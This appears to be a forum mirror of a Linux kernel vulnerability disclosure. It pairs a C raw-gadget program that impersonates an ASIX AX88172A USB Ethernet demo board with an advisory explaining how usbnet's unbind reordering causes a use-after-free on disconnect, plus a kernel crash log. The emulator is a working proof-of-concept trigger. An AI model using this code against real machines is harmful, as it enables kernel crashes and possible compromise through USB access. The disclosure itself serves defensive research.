Jump to content
Kev

Linux USB Use-After-Free

Recommended Posts

Posted

Linux USB usbnet tells minidrivers to unbind while netdev is still up, causing use-after-free conditions.

 

Download: GS20230313141819.tgz (10.7 KB)

 

Mirror:

  • usb-ax88172a.c
// roughly based off https://github.com/xairy/raw-gadget/blob/master/examples/keyboard.c
// NOTE: this is playing fast-and-loose with endianness, it'll break on big-endian systems.

#include <err.h>
#include <signal.h>
#include <stdbool.h>
#include <assert.h>
#include <alloca.h>
#include <errno.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/usb/cdc.h>
#include <linux/usb/raw_gadget.h>
#include <linux/mii.h>
#include <linux/mdio.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static int usb_fd;

#define errx(code, ...) { printf(__VA_ARGS__); printf("\n"); while (1) pause(); }

struct usb_raw_control_event {
  struct usb_raw_event inner;
  struct usb_ctrlrequest ctrl;
};

static struct usb_device_descriptor usb_device = {
  .bLength = USB_DT_DEVICE_SIZE,
  .bDescriptorType = USB_DT_DEVICE,
  .bcdUSB = __constant_cpu_to_le16(0x0200), /* USB 2.0 */
  .bDeviceClass = __constant_cpu_to_le16(USB_CLASS_COMM), // is this even used?
  .bMaxPacketSize0 = 64, /* maximum value the kernel lets us use */

  /* "We are a very legit..." (checks notes) "ASIX 88172a demo board" (looks
   * back up) "and would like to help you get connected to the network!" */
  .idVendor = __constant_cpu_to_le16(0x0b95),
  .idProduct = __constant_cpu_to_le16(0x172a),

  .iManufacturer = 1,
  .iProduct = 2,
  .iSerialNumber = 3,

  .bNumConfigurations = 1
};

struct usb_config_descriptor usb_config = {
  .bLength = USB_DT_CONFIG_SIZE,
  .bDescriptorType = USB_DT_CONFIG,
  .wTotalLength = 0, // fixed up later
  .bNumInterfaces = 1,
  .bConfigurationValue = 1,
  .iConfiguration = 4,
  .bmAttributes =
    USB_CONFIG_ATT_ONE |// must be set
    USB_CONFIG_ATT_SELFPOWER,
  .bMaxPower = 0 // no power draw from host
};
struct usb_interface_descriptor usb_interface = {
  .bLength = USB_DT_INTERFACE_SIZE,
  .bDescriptorType = USB_DT_INTERFACE,
  .bInterfaceNumber = 0,
  .bAlternateSetting = 0,
  .bNumEndpoints = 3,
  .bInterfaceClass = USB_CLASS_COMM, // ?
  .bInterfaceSubClass = USB_CDC_SUBCLASS_ETHERNET,
  .bInterfaceProtocol = USB_CDC_PROTO_NONE,
  .iInterface = 5,

};
struct usb_endpoint_descriptor usb_endpoint_in = {
  .bLength = USB_DT_ENDPOINT_SIZE,
  .bDescriptorType = USB_DT_ENDPOINT,
  .bEndpointAddress = USB_DIR_IN | 1,
  .bmAttributes = USB_ENDPOINT_XFER_BULK,
  .wMaxPacketSize = 512,
  //.bInterval = 1
};
struct usb_endpoint_descriptor usb_endpoint_out = {
  .bLength = USB_DT_ENDPOINT_SIZE,
  .bDescriptorType = USB_DT_ENDPOINT,
  .bEndpointAddress = USB_DIR_OUT | 1,
  .bmAttributes = USB_ENDPOINT_XFER_BULK,
  .wMaxPacketSize = 512,
  //.bInterval = 1
};
struct usb_endpoint_descriptor usb_endpoint_intr = {
  .bLength = USB_DT_ENDPOINT_SIZE,
  .bDescriptorType = USB_DT_ENDPOINT,
  .bEndpointAddress = USB_DIR_IN | 2,
  .bmAttributes = USB_ENDPOINT_XFER_INT,
  .wMaxPacketSize = 8,
  .bInterval = 1
};
unsigned short intr_handle;

void usb_reply(void *data, size_t len, size_t req_length) {
  printf("         REPLY: size %lu, req_length %lu\n", (unsigned long)len, (unsigned long)req_length);
  if (len > req_length)
    len = req_length;
  struct usb_raw_ep_io *io = alloca(sizeof(struct usb_raw_ep_io)+len);
  io->ep = 0;
  io->flags = 0;
  io->length = len;
  memcpy(io->data, data, len);
  SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP0_WRITE, io));
}

void usb_reply_zero(size_t req_length) {
  char *data = alloca(req_length);
  memset(data, '\0', req_length);
  usb_reply(data, req_length, req_length);
}

void usb_get_and_ack(void *buf, size_t len, size_t req_length) {
  printf("         ACK OUT: req_length %lu\n", (unsigned long)req_length);
  struct usb_raw_ep_io *io = alloca(sizeof(struct usb_raw_ep_io)+req_length);
  memset(io, 0xee, sizeof(struct usb_raw_ep_io)+req_length);
  io->ep = 0;
  io->flags = 0;
  io->length = req_length;
  //printf("issuing USB_RAW_IOCTL_EP0_READ with io->length=%u\n", io->length);
  int ret_len = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP0_READ, io));
  assert(ret_len == req_length);
  if (buf) {
    if (len > req_length) {
      memset(buf, '\0', len);
      len = req_length;
    }
    memcpy(buf, ((char*)io)+sizeof(struct usb_raw_ep_io), len);
  }
}
void usb_ack(size_t req_length) {
  usb_get_and_ack(NULL, 0, req_length);
}

void descr_append(void *buf, size_t *buf_len, void *descr, size_t descr_len) {
  printf("           descr_append(buf, len, descr, descr_len=%lu with first byte %hhu\n", (unsigned long)descr_len, *(unsigned char *)descr);
  assert(descr_len <= 255);
  assert(descr_len >= 2);
  assert(((unsigned char*)descr)[0] == descr_len);
  memcpy(buf + *buf_len, descr, descr_len);
  (*buf_len) += descr_len;
  ((struct usb_config_descriptor*)buf)->wTotalLength = __cpu_to_le16(*buf_len);
}

int state = 0;

void handle_alarm(int sig) {
  if (state == 0)
    state = 1;
}

int main(int argc, char **argv) {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);
  usb_fd = SYSCHK(open("/dev/raw-gadget", O_RDWR));

  struct usb_raw_init init_args = {
    .speed = USB_SPEED_HIGH
  };
  strcpy(init_args.driver_name, argv[1]);
  strcpy(init_args.device_name, argv[2]);
  SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_INIT, &init_args));
  SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_RUN, 0));

  struct sigaction alarm_act = {
    .sa_handler = handle_alarm,
    .sa_flags = 0
  };
  if (sigaction(SIGALRM, &alarm_act, NULL))
    err(1, "sigaction");
  //alarm(30);

  while (1) {
    if (state == 1) {
      printf("===================== BRINGING LINK UP =====================\n");
      state = 2;
      struct {
        struct usb_raw_ep_io io;
        struct { /*ax88172_int_data*/
          unsigned short res1;
          unsigned char link;
          unsigned short res2;
          unsigned char status;
          unsigned short res3;
          unsigned int intdata2;
        } __attribute__((packed)) data;
      } io_with_data = {
        .io = {
          .ep = intr_handle,
          .flags = 0,
          .length = sizeof(io_with_data.data)
        }, .data = {
          .link = 1
        }
      };
      SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_WRITE, &io_with_data));
      /*
      close(usb_fd);
      exit(0);
      */
    }

    struct usb_raw_control_event control_ev = {
      .inner = { .type = 0, .length = sizeof(control_ev.ctrl) }
    };
    int res = ioctl(usb_fd, USB_RAW_IOCTL_EVENT_FETCH, &control_ev);
    if (res == -1) {
      if (errno == EINTR)
        continue;
      err(1, "USB_RAW_IOCTL_EVENT_FETCH");
    }
    if (control_ev.inner.type == USB_RAW_EVENT_CONNECT) {
      // nothing to do
    } else if (control_ev.inner.type == USB_RAW_EVENT_CONTROL) {
      unsigned req_length = __le16_to_cpu(control_ev.ctrl.wLength);
      bool is_dir_in = (control_ev.ctrl.bRequestType & USB_DIR_IN) != 0;
      printf("got control (in=%d, wLength=%u):\n", is_dir_in, req_length);
      switch (control_ev.ctrl.bRequestType & USB_TYPE_MASK) {
        case USB_TYPE_STANDARD:
          switch(control_ev.ctrl.bRequest) {
            case USB_REQ_GET_DESCRIPTOR: {
              unsigned descriptor_type = control_ev.ctrl.wValue >> 8;
              switch (descriptor_type) {
                case USB_DT_DEVICE:
                  printf("  getting device descriptor\n");
                  usb_reply(&usb_device, sizeof(usb_device), req_length);
                  break;
                case USB_DT_CONFIG: {
                  printf("  getting dt config\n");
                  char dt_config[1024*128];
                  size_t dt_config_len = 0;
                  descr_append(dt_config, &dt_config_len, &usb_config, sizeof(usb_config));
                  descr_append(dt_config, &dt_config_len, &usb_interface, sizeof(usb_interface));
                  descr_append(dt_config, &dt_config_len, &usb_endpoint_in, USB_DT_ENDPOINT_SIZE);
                  descr_append(dt_config, &dt_config_len, &usb_endpoint_out, USB_DT_ENDPOINT_SIZE);
                  descr_append(dt_config, &dt_config_len, &usb_endpoint_intr, USB_DT_ENDPOINT_SIZE);
                  usb_reply(dt_config, dt_config_len, req_length);
                } break;
                case USB_DT_STRING: {
                  unsigned string_id = control_ev.ctrl.wValue & 0xff;
                  printf("  getting string %d\n", string_id);
                  if (string_id == 0) {
                    unsigned char string_descr[] = {
                      4/*length*/, USB_DT_STRING,
                      0x09, 0x04 /* English - United States */
                    };
                    usb_reply(string_descr, sizeof(string_descr), req_length);
                  } else {
                    unsigned char string_descr[] = {
                      12/*length*/, USB_DT_STRING,
                      'D',0,'U',0,'M',0,'M',0,'Y',0
                    };
                    usb_reply(string_descr, sizeof(string_descr), req_length);
                  }
                } break;
                default:
                  errx(1, "USB_REQ_GET_DESCRIPTOR: descriptor_type=%x", descriptor_type);
              }
            } break;
            case USB_REQ_SET_CONFIGURATION: {
              printf("  set configuration\n");
              SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_in));
              SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_out));
              intr_handle = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_intr));
              SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_CONFIGURE, 0));
              usb_ack(req_length);
            } break;
            case USB_REQ_SET_INTERFACE: {
              printf("  set interface\n");
              usb_ack(req_length);
            } break;
            default:
              errx(1, "unknown standard ctrlrequest 0x%x", (unsigned)control_ev.ctrl.bRequest);
          }
          break;
        case USB_TYPE_CLASS:
          errx(1, "unknown class ctrlrequest");
        case USB_TYPE_VENDOR:
          printf("  vendor ctrlrequest bRequest=0x%02hhx wValue=0x%04hx wIndex=0x%04hx wLength=0x%04hx\n", control_ev.ctrl.bRequest, control_ev.ctrl.wValue, control_ev.ctrl.wIndex, control_ev.ctrl.wLength);
          if (!is_dir_in) {
            usb_ack(req_length);
            continue;
          }
          switch (control_ev.ctrl.bRequest) {
#if 1
            case 0x01/*AX_ACCESS_MAC*/: {
              static unsigned char srom_addr;
              static const unsigned short ledvalue = (1<<15/*LED_VALID*/);
              printf("  AX_ACCESS_MAC\n");
              switch (control_ev.ctrl.wValue) {
                case 0x02/*PHYSICAL_LINK_STATUS*/: {
                  printf("    PHYSICAL_LINK_STATUS\n");
                  /* Linux checks AX_USB_SS and AX_USB_HS, influences URB size:
                   * ->rx_urb_size
                   * can be 0x5000 / 0x6000 / 0x6800 / 0x6800
                   * We prefer the smallest one (0x5000), which we get from
                   * setting AX_USB_SS plus GMII_PHY_PHYSR_GIGA.
                   */
                  unsigned char pl_status = 0x04; /*AX_USB_SS*/
                  usb_reply(&pl_status, sizeof(pl_status), req_length);
                } break;
                case 0x03/*GENERAL_STATUS*/: {
                  printf("    GENERAL_STATUS\n");
                  unsigned short general_status = __cpu_to_le16(0x04/*AX_SECLD*/);
                  usb_reply(&general_status, 2, req_length);
                } break;
                case 0x07/*AX_SROM_ADDR*/: {
                  printf("    AX_SROM_ADDR\n");
                  usb_get_and_ack(&srom_addr, 1, req_length);
                  printf("    SROM address: 0x%hhx\n", srom_addr);
                } break;
                case 0x08/*AX_SROM_DATA_LOW*/: {
                  printf("    AX_SROM_DATA_LOW from 0x%hhx\n", srom_addr);
                  if (srom_addr < 6) {
                    unsigned char eeprom_head[12] = {
                      /*0-5*/0, 0, 0, 0, 0, 0, // dontcare (first must not be FF)
                      /*6-9*/0, 0, 0, 0, // checksummed
                      /*10*/0xff // checksum
                    };
                    usb_reply(eeprom_head + srom_addr*2, 2, req_length);
                  } else if (srom_addr == 0x42) {
                    unsigned char b = 8 & 0xff;
                    usb_reply(&b, 1, req_length);
                  } else {
                    errx(1, "unhandled SROM range");
                  }
                } break;
                case 0x09/*AX_SROM_DATA_HIGH*/: {
                  printf("    AX_SROM_DATA_HIGH from 0x%hhx\n", srom_addr);
                  if (srom_addr == 0x42) {
                    unsigned char b = ledvalue >> 8;
                    usb_reply(&b, 1, req_length);
                  } else {
                    errx(1, "unhandled SROM range");
                  }
                } break;
                case 0x0a/*AX_SROM_CMD*/: {
                  printf("    AX_SROM_CMD\n");
                  if (is_dir_in) {
                    unsigned char value = 0; // EEP_BUSY would spin until timeout
                    usb_reply(&value, 1, req_length);
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                case 0x0b/*AX_RX_CTL*/: {
                  unsigned short ax_rx_ctl_value;
                  usb_get_and_ack(&ax_rx_ctl_value, sizeof(ax_rx_ctl_value), req_length);
                  printf("    AX_RX_CTL = 0x%04hx  ################\n", ax_rx_ctl_value);
                } break;
                case 0x16/*AX_MULFLTARY*/: {
                  printf("    AX_MULFLTARY  ||||||||||||||||||||||||||||||||||||||||||\n");
                  usb_ack(req_length);
                  if (state == 0)
                    state = 1;
                } break;
                case 0x22/*AX_MEDIUM_STATUS_MODE*/: {
                  printf("    AX_MEDIUM_STATUS_MODE\n");
                  usb_ack(req_length);
                } break;
                case 0x24/*AX_MONITOR_MOD*/: {
                  printf("    AX_MONITOR_MOD\n");
                  usb_ack(req_length);
                } break;
                case 0x26/*AX_PHYPWR_RSTCTL*/: {
                  printf("    AX_PHYPWR_RSTCTL\n");
                  usb_ack(req_length);
                } break;
                case 0x2e/*AX_RX_BULKIN_QCTRL*/: {
                  printf("    AX_RX_BULKIN_QCTRL\n");
                  usb_ack(req_length);
                } break;
                case 0x34/*AX_RXCOE_CTL*/: {
                  printf("    AX_RXCOE_CTL\n");
                  usb_ack(req_length);
                } break;
                case 0x35/*AX_TXCOE_CTL*/: {
                  printf("    AX_TXCOE_CTL\n");
                  usb_ack(req_length);
                } break;
                case 0x54/*AX_PAUSE_WATERLVL_HIGH*/: {
                  printf("    AX_PAUSE_WATERLVL_HIGH\n");
                  usb_ack(req_length);
                } break;
                case 0x55/*AX_PAUSE_WATERLVL_LOW*/: {
                  printf("    AX_PAUSE_WATERLVL_LOW\n");
                  usb_ack(req_length);
                } break;
                case 0x73/*AX_LEDCTRL*/: {
                  printf("    AX_LEDCTRL\n");
                  usb_ack(req_length);
                } break;
                case 0x33/*AX_CLOCK_SELECT*/: {
                  printf("    AX_CLOCK_SELECT\n");
                  usb_ack(req_length);
                } break;
                case 0x10/*AX_NODE_ID*/: {
                  printf("    AX_NODE_ID\n");
                  if (is_dir_in) {
                    unsigned char mac_addr[] = { 0x00, 0x12, 0x34, 0x56, 0x78, 0x90 };
                    usb_reply(mac_addr, sizeof(mac_addr), req_length);
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                default:
                  if (is_dir_in) {
                    errx(1, "    unknown AX_ACCESS_MAC command 0x%02hhx", control_ev.ctrl.wValue);
                  } else {
                    printf("    ignoring unknown OUT AX_ACCESS_MAC command 0x%02hx\n", control_ev.ctrl.wValue);
                  }
              }
            } break;
            case 0x02/*AX_ACCESS_PHY*/: {
              printf("  AX_ACCESS_PHY\n");
              assert(control_ev.ctrl.wValue == 0x03/*AX88179_PHY_ID*/);
              static unsigned short mmd_id;
              static bool no_auto_increment;
              switch (control_ev.ctrl.wIndex) {
                case MII_BMCR: { /* Basic mode control register */
                  /* idk what any of these flags actually do in detail... */
                  printf("    MII_BMCR (basic mode control register)\n");
                  if (is_dir_in) {
                    unsigned short bmcr_state = BMCR_SPEED1000 | BMCR_FULLDPLX;
                    usb_reply(&bmcr_state, sizeof(bmcr_state), req_length);
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                case MII_MMD_CTRL: {
                  printf("    MII_MMD_CTRL\n");
                  usb_get_and_ack(&mmd_id, 2, req_length);
                  mmd_id &= ~0x4000;
                  no_auto_increment = (mmd_id & 0x4000) != 0;
                  printf("    set ID %d, no-auto-increment %d\n", mmd_id, no_auto_increment);
                } break;
                case MII_MMD_DATA: {
                  printf("    MII_MMD_DATA (at ID %d)\n", mmd_id);
                  if (is_dir_in) {
                    switch (mmd_id) {
                      case MDIO_MMD_PCS:
                        printf("    Physical Coding Sublayer\n");
                        // decoded via mmd_eee_cap_to_ethtool_sup_t()
                        unsigned short eee_caps = MDIO_EEE_1000T;
                        usb_reply(&eee_caps, sizeof(eee_caps), req_length);
                        break;
                      case MDIO_MMD_AN:
                        printf("    Auto-Negotiation\n");
                        // WARNING: this is actually used in two different
                        //          contexts
                        unsigned short eee_adv = MDIO_EEE_1000T;
                        usb_reply(&eee_adv, sizeof(eee_adv), req_length);
                        break;
                      default:
                        errx(1, "unknown ID %d", mmd_id);
                    }
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                case MII_PHYADDR: {
                  printf("    MII_PHYADDR\n");
                  usb_ack(req_length);
                } break;
                case 0x11/*GMII_PHY_PHYSR*/: {
                  printf("    MII_PHY_PHYSR\n");
                  unsigned short physr = 0x0400/*GMII_PHY_PHYSR_LINK*/ |
                                         0x8000/*GMII_PHY_PHYSR_GIGA*/;
                  usb_reply(&physr, sizeof(physr), req_length);
                } break;
                case 0x1a/*GMII_LED_ACT*/: {
                  printf("    GMII_LED_ACT\n");
                  if (is_dir_in) {
                    unsigned short ledact = 0;
                    usb_reply(&ledact, sizeof(ledact), req_length);
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                case 0x1c/*GMII_LED_LINK*/: {
                  printf("    GMII_LED_LINK\n");
                  if (is_dir_in) {
                    unsigned short ledlink = 0;
                    usb_reply(&ledlink, sizeof(ledlink), req_length);
                  } else {
                    usb_ack(req_length);
                  }
                } break;
                case 0x1e/*GMII_PHYPAGE*/: {
                  printf("    GMII_PHYPAGE\n");
                  usb_ack(req_length);
                } break;
                case 0x1f/*GMII_PHY_PAGE_SELECT*/: {
                  printf("    GMII_PHY_PAGE_SELECT\n");
                  usb_ack(req_length);
                } break;
                default:
                  errx(1, "    unknown AX_ACCESS_PHY command 0x%02hhx", control_ev.ctrl.wIndex);
              }
            } break;
            case 0x04/*AX_ACCESS_PHY*/: {
              unsigned eeprom_idx = (unsigned)control_ev.ctrl.wValue;
              printf("  AX_ACCESS_EEPROM at 0x%x\n", eeprom_idx);
              if (is_dir_in) {
                printf("    EEPROM read\n");
                switch (eeprom_idx) {
                  case 0x43: {/* autodetach */
                    unsigned short autodetach = 0xffff;
                    usb_reply(&autodetach, sizeof(autodetach), req_length);
                  } break;
                  default:
                    errx(1, "unhandled EEPROM offset");
                }
              } else {
                printf("    ignoring EEPROM write\n");
                usb_ack(req_length);
              }
            } break;
            case 0x81: {
              printf("  0x81 TX FIFO check\n");
              unsigned int tx_fifo_state = 0;
              usb_reply(&tx_fifo_state, sizeof(tx_fifo_state), req_length);
            } break;
#endif
            case 0x13/*AX_CMD_READ_NODE_ID*/: {
              unsigned char mac_addr[] = { 0x00, 0x12, 0x34, 0x56, 0x78, 0x90 };
              usb_reply(mac_addr, sizeof(mac_addr), req_length);
            } break;
            case 0x21/*AX_CMD_SW_PHY_STATUS*/:
            case 0x1a/*AX_CMD_READ_MEDIUM_STATUS*/:
            case 0x0f/*AX_CMD_READ_RX_CTL*/: {
              usb_reply_zero(req_length);
            } break;
            case 0x19/*AX_CMD_READ_PHY_ID*/: {
              printf("    CMD_READ_PHY_ID\n");
              unsigned short phy_id = 1;
              usb_reply(&phy_id, sizeof(phy_id), req_length);
            } break;
            case 0x09/*AX_CMD_STATMNGSTS_REG*/: {
              printf("    CMD_STATMNGSTS_REG\n");
              unsigned char val = 0x01; /* AX_HOST_EN */
              usb_reply(&val, sizeof(val), req_length);
            } break;
            case 0x07/*AX_CMD_READ_MII_REG*/: {
              printf("    CMD_READ_MII_REG\n");
              /*
                unsigned char val = 0x01;
                usb_reply(&val, sizeof(val), req_length);
                */
              switch (control_ev.ctrl.wIndex) {
                case MII_BMCR: { /* Basic mode control register */
                  /* idk what any of these flags actually do in detail... */
                  printf("    MII_BMCR (basic mode control register)\n");
                  unsigned short bmcr_state = BMCR_SPEED100 | BMCR_FULLDPLX;
                  usb_reply(&bmcr_state, sizeof(bmcr_state), req_length);
                } break;
                case MII_BMSR: { /* Basic mode status register */
                  printf("    MII_BMSR (basic mode status register)\n");
                  /* say link is initially down */
                  unsigned short bmsr_state = ((state > 0) ? BMSR_LSTATUS : 0) | BMSR_100FULL;
                  usb_reply(&bmsr_state, sizeof(bmsr_state), req_length);
                } break;
                case MII_ADVERTISE: { /* Advertisement control register */
                  printf("    MII_ADVERTISE\n");
                  unsigned short adv_state = ADVERTISE_100FULL;
                  usb_reply(&adv_state, sizeof(adv_state), req_length);
                } break;
                case MII_LPA: { /* Link partner ability */
                  printf("    MII_LPA (Link partner ability)\n");
                  unsigned short lpa_state = LPA_100FULL;
                  usb_reply(&lpa_state, sizeof(lpa_state), req_length);
                } break;
                case MII_PHYSID1:
                case MII_PHYSID2: {
                  printf("    MII_PHYSID\n");
                  unsigned short physid = 1;
                  usb_reply(&physid, sizeof(physid), req_length);
                } break;
                default:
                  errx(1, "    unknown READ_MII_REG command 0x%02hhx", control_ev.ctrl.wIndex);
              }
            } break;
#if 0
            case 0x10/*AX_CMD_WRITE_RX_CTL*/: {
              printf("    CMD_WRITE_RX_CTL = 0x%hx\n", control_ev.ctrl.wIndex);
              usb_ack(req_length);
            } break;
            case 0x16/*AX_CMD_WRITE_MULTI_FILTER*/: {
              printf("    CMD_WRITE_MULTI_FILTER\n");
              usb_ack(req_length);
            } break;
#endif
            default:
              if (is_dir_in) {
                errx(1, "unknown vendor ctrlrequest 0x%02hhx", control_ev.ctrl.bRequest);
              } else {
                printf("    ignoring unknown vendor ctrlrequest 0x%02hx\n", control_ev.ctrl.bRequest);
                usb_ack(req_length);
              }
          }
          break;
        default:
          errx(1, "USB_TYPE_* unknown");
      }
    } else {
      printf("unknown event, type 0x%x\n", (unsigned)control_ev.inner.type);
    }
  }
}

 

  • advisory-info.txt
Linux USB: usbnet tells minidrivers to unbind while netdev is still up, causing UAFs

I've been digging more into the usbnet code, and it's all really brittle.
I keep hitting random KASAN splats while I'm just trying to normally bring
up drivers (mainly when my fake USB device can't handle some request yet
and exits, which results in a USB disconnect, and apparently usbnet
tends to blow up a lot in various ways if you disconnect before the
device is fully up, at least on a kernel with
CONFIG_RCU_STRICT_GRACE_PERIOD=y).

One particularly easy-to-trigger bug was introduced by
commit 2c9d6c2b871d (\"usbnet: run unbind() before unregister_netdev()\"),
first in v5.14.

Before that commit, the driver_info->unbind() callback was the last call
to the minidriver during USB disconnect, and so one of the things some
minidrivers do there is to free memory associated with the device.

But after that commit, the semantics of driver_info->unbind() are
completely different: It is called at a point where the networking
subsystem **has no idea** yet that the device is going down.
The netdev might still be up, or in the middle of going up, or going
down, or whatever else netdevs do; and so it is still possible that
e.g. userspace sends some netlink message that results in a call to
the minidriver's ->reset method, and then e.g. aqc111_reset() will
try to access its freed dev->driver_priv, and you get UAF.


I looked at this more, and it turns out that with another
minidriver, you don't even need to race to cause a UAF:
Simply disconnecting a USB device when it is currently up will
reliably cause a UAF.

This is the case with the driver in drivers/net/usb/ax88172a.c
(described as \"ASIX AX88172A USB 2.0 Ethernet\"), which is only
used for the USB device ID of some demo board, nothing else:

  /* ASIX 88172a demo board */
  USB_DEVICE(0x0b95, 0x172a),
  .driver_info = (unsigned long) &ax88172a_info,

(Even though this driver is only used for talking to some demo
board, it is enabled in kconfig together with all the other ASIX
devices using kconfig flag CONFIG_USB_NET_AX8817X, which is
enabled on many kernels, including Debian, some Android kernels
and Chrome OS. Android and Chrome OS are probably not affected
by this one though, since they run sufficiently old kernels...)

The call graph of how the UAF happens:

usbnet_disconnect
  ax88172a_unbind (as driver_info->unbind)
    kfree(dev->driver_priv)
  unregister_netdev
    unregister_netdevice
      unregister_netdevice_queue
        unregister_netdevice_many
          dev_close_many
            __dev_close_many
              usbnet_stop (as ops->ndo_stop)
                ax88172a_stop (as driver_info->stop)
                  [UAF access to dev->driver_priv]

The driver_info->stop() handler tries to access data that was freed
in driver_info->unbind(). This makes it pretty clear that the
reordering in commit 2c9d6c2b871d broke stuff.


I have no clue how to fix all this though. From what I can tell,
there are two points during usbnet_disconnect() where the
minidriver might want to get a callback:

 - When ->ndo_close() is invoked by the netdev code; at that point,
   the netdev is definitely down but hasn't been completely torn
   down yet. usbnet doesn't currently use ->ndo_open/->ndo_close
   at all.
 - In the spot where the driver_info->unbind callback used to
   happen before commit 2c9d6c2b871d.

But I have no clue whether we need one or both of these, and
which of the things the current ->unbind callbacks do have to
happen at what time.
commit 2c9d6c2b871d claims that the current ->unbind callback
is too late for the minidriver to disconnect PHY, so I guess
that should probably happen in ->ndo_close()? Maybe?



This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2022-05-19.


==== kernel splats and reproduction instructions ====

On a system running a normal Debian experimental kernel
(version 5.17.0-rc3-amd64 #1  Debian 5.17~rc3-1~exp1), this also
happens. With slub_debug=PF (to make SLUB poison freed memory
and do some extra consistency checks to make UAFs easier to see),
I get this in dmesg when I attach a fake USB device (over real
USB, using a NET2380 USB device-side controller on another
machine), wait for a few seconds so that it can be brought up
completely, and then disconnect it:

[  138.697877] usb 1-2: new high-speed USB device number 3 using xhci_hcd
[  138.852315] usb 1-2: New USB device found, idVendor=0b95, idProduct=172a, bcdDevice= 0.00
[  138.856972] usb 1-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[  138.861557] usb 1-2: Product: DUMMY
[  138.866016] usb 1-2: Manufacturer: DUMMY
[  138.870312] usb 1-2: SerialNumber: DUMMY
[  139.403344] asix 1-2:1.0 (unnamed net_device) (uninitialized): registered mdio bus usb-001:003
[  139.404897] asix 1-2:1.0 eth1: register 'asix' at usb-0000:00:14.0-2, ASIX AX88172A USB 2.0 Ethernet, 00:12:34:56:78:90
[  139.406292] usbcore: registered new interface driver asix
[  139.408747] usbcore: registered new interface driver cdc_ether
[  139.481399] asix 1-2:1.0 enx001234567890: renamed from eth1
[  140.150427] asix 1-2:1.0 enx001234567890: Connected to phy usb-001:003:00
[  149.299153] usb 1-2: USB disconnect, device number 3
[  149.303077] asix 1-2:1.0 enx001234567890: unregister 'asix' usb-0000:00:14.0-2, ASIX AX88172A USB 2.0 Ethernet
[  149.306775] asix 1-2:1.0 enx001234567890: deregistering mdio bus usb-001:003
[  149.314206] asix 1-2:1.0 enx001234567890: Disconnecting from phy kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk\\xa5%!LhH\\xf2/\\xa1ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ\\x80\\xe5W\\xe1\\xf9\\x99\\xff\\xff\\xe0#\u0561\\xff\\xff\\xff\\xff\\x80t\\xf0\\xc0\\xff\\xff\\xff\\xff\\x98XW\\x82\\xf9\\x99\\xff\\xff\\x80\\xb9[\\xe1\\xf9\\x99\\xff\\xff
[  149.315731] general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6f43: 0000 [#1] PREEMPT SMP PTI
[  149.317234] CPU: 4 PID: 105 Comm: kworker/4:1 Tainted: G            E     5.17.0-rc3-amd64 #1  Debian 5.17~rc3-1~exp1
[  149.318815] Hardware name: [...]
[  149.320214] Workqueue: usb_hub_wq hub_event [usbcore]
[  149.321030] RIP: 0010:phy_stop+0x9/0xf0 [libphy]
[  149.321835] Code: 02 e0 eb d4 48 8b 0c dd 20 ed b9 c0 e9 33 ff ff ff 4c 89 f7 e8 68 a3 fa df eb c6 e8 11 ff 1a e0 90 0f 1f 44 00 00 41 54 55 53 <8b> 87 d8 03 00 00 4c 8b a7 28 05 00 00 8d 50 ff 83 fa 01 0f 86 af
[  149.322714] RSP: 0018:ffffb68a807efa58 EFLAGS: 00010246
[  149.323560] RAX: 0000000000000000 RBX: ffff99f9e168e980 RCX: 0000000000000000
[  149.324405] RDX: ffffb68a807efa08 RSI: ffffffffa15526f6 RDI: 6b6b6b6b6b6b6b6b
[  149.325251] RBP: ffff99f9e15bbb80 R08: 0000000000000000 R09: ffffb68a807ef758
[  149.326128] R10: ffffb68a807ef750 R11: ffffffffa1cd1568 R12: 0000000000000000
[  149.326965] R13: ffff99f9e168e980 R14: ffffb68a807efad0 R15: ffffb68a807efba0
[  149.327800] FS:  0000000000000000(0000) GS:ffff99fc8f700000(0000) knlGS:0000000000000000
[  149.328641] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  149.329482] CR2: 00007fc2351ba6f4 CR3: 00000002fb410001 CR4: 00000000001706e0
[  149.330352] Call Trace:
[  149.331198]  <TASK>
[  149.332030]  ax88172a_stop.cold+0x20/0x2e [asix]
[  149.332857]  usbnet_stop+0x64/0x140 [usbnet]
[  149.333676]  __dev_close_many+0x9e/0x110
[  149.334512]  dev_close_many+0x8b/0x140
[  149.335295]  ? __slab_free+0xa0/0x330
[  149.336059]  unregister_netdevice_many+0x158/0x740
[  149.336816]  ? kfree+0x218/0x250
[  149.337573]  unregister_netdevice_queue+0xcb/0x110
[  149.338361]  unregister_netdev+0x18/0x20
[  149.339112]  usbnet_disconnect+0x59/0xb0 [usbnet]
[  149.339864]  usb_unbind_interface+0x8a/0x270 [usbcore]
[  149.340616]  __device_release_driver+0x22d/0x240
[  149.341358]  device_release_driver+0x24/0x30
[  149.342112]  bus_remove_device+0xd8/0x140
[  149.342840]  device_del+0x18b/0x3f0
